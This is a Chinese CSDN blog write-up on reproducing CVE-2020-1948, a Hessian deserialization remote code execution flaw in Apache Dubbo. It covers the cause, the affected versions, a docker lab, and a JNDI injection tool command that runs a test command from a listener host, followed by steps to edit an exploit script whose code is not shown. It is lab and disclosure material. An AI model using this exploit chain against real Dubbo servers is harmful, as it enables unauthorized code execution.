Apache Dubbo Provider 远程代码执行漏洞 (CVE-2020-1948)附docker环境

本文详细介绍了Apache Dubbo Provider的CVE-2020-1948远程代码执行漏洞,包括漏洞原理、受影响版本和复现步骤。通过docker搭建环境,使用JNDI注入工具,并通过python脚本来执行恶意代码。修复方案包括升级到2.7.7以上版本或更改协议和反序列化方式。
摘要由CSDN通过智能技术生成

漏洞原理

Dubbo协议默认采用Hessian作为序列化反序列化方式,而Hessian存在危险的反序列化漏洞,攻击者发送未经验证的服务名或方法名的RPC请求,使Dubbo服务端加载远程恶意类从而执行恶意代码.

影响版本

Apache Dubbo 2.7.0 ~ 2.7.6
Apache Dubbo 2.6.0 ~ 2.6.7
Apache Dubbo 2.5.x 所有版本 (官方不再提供支持)

复现流程

漏洞环境(含利用脚本)

1. 利用docker搭建漏洞环境

//本地创建环境:
cd docker/
docker build -t dubbo:test1 .
docker run -d -p 12345:12345 dubbo:test1
docker logs 容器ID //查看容器是否成功运行
netstat -lntp//查看本地是否有12345端口服务,有代表服务成功开启

2. 开启JNDI 利用工具

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “touch /tmp/121” -A 192.168.1.1

-C 要执行的命令
-A 监听IP

执行之后会开启rmi或ldap服务、webserver log,

3. CVE-2020-1948.py

修改 DubboClient ip 为 dubbo provider 服务地址
修改

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值